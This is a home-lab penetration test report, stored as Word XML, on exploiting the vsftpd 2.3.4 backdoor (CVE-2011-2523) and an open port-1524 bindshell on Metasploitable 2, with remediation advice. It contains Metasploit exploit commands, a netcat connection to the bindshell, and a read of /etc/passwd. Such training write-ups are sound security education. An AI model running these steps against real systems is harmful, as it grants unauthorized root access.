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48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 04 — Exploitation with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2011-2523 vsftpd Backdoor Exploitation on Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by: Terrell | Tee-Clouds Home Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: 2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIDENTIAL — FOR EDUCATIONAL USE ONLY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the exploitation of a known backdoor vulnerability (CVE-2011-2523) in vsftpd 2.3.4 on the Metasploitable 2 target using the Metasploit Framework. A root-level shell was obtained. Additionally, an open bindshell on port 1524 was discovered and exploited via Netcat. Both vulnerabilities represent critical security failures that would result in full system compromise in any environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Engagement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Tester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Terrell (Tee-Clouds)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Target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Metasploitable 2 (192.168.56.101)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Attacker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Kali Linux (192.168.56.102)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Framework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Metasploit Framework 6.x</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CVE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CVE-2011-2523 (vsftpd 2.3.4 Backdoor)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Authorization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Self-authorized — isolated lab environment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Outcome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Root shell obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2011-2523 — vsftpd 2.3.4 Backdoor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CVE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CVE-2011-2523</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CVSS Score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(Critical)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Affected Software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vsftpd 2.3.4</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Vulnerability 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Backdoor / Remote Code Execution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Attack Vector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Network — no authentication required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Impact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root command execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The vsftpd 2.3.4 source code was compromised in 2011 and a backdoor was introduced. When a username containing a smiley face (:)) is sent during FTP authentication, the backdoor opens a root shell on TCP port 6200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Exploitation — CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Reconnaissance Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Target confirmed running vsftpd 2.3.4 via Nmap service scan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">21/tcp open  ftp  vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Metasploit Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Exploitation Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit triggered the backdoor by appending :) to the FTP username</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command shell session opened on target port 6200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell returned as root — uid=0(root) gid=0(root) confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full filesystem access obtained with no privilege escalation required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Exploitation — Open Bindshell (Port 1524)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">During Nmap scanning, port 1524 was identified:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1524/tcp open ingreslock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Exploitation via Netcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.56.101 1524</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat connected directly to the bindshell with no authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Root shell returned immediately — uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This represents an intentional backdoor left in Metasploitable 2 for training purposes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Post-Exploitation Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Commands Executed (Proof of Access)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd | head -5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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3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vsftpd 2.3.4 Backdoor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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical (10.0)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Unauthenticated root RCE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Bindshell (1524)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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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Unauthenticated root shell access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediately decommission vsftpd 2.3.4 — replace with patched FTP server or SFTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Close port 1524 — firewall rule or disable the ingreslock service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct regular vulnerability scanning using tools like OpenVAS or Nessus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a patch management process to prevent use of software with known CVEs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply network segmentation — critical services should not be directly reachable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Two critical vulnerabilities were successfully exploited on the Metasploitable 2 target, both resulting in unauthenticated root-level access. CVE-2011-2523 is a real-world supply chain attack where malicious code was injected into a software distribution. This exercise demonstrates the devastating impact of unpatched software and reinforces the need for continuous vulnerability management and network monitoring in any production environment.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2026-06-09T20:55:06.696Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-09T20:55:06.696Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>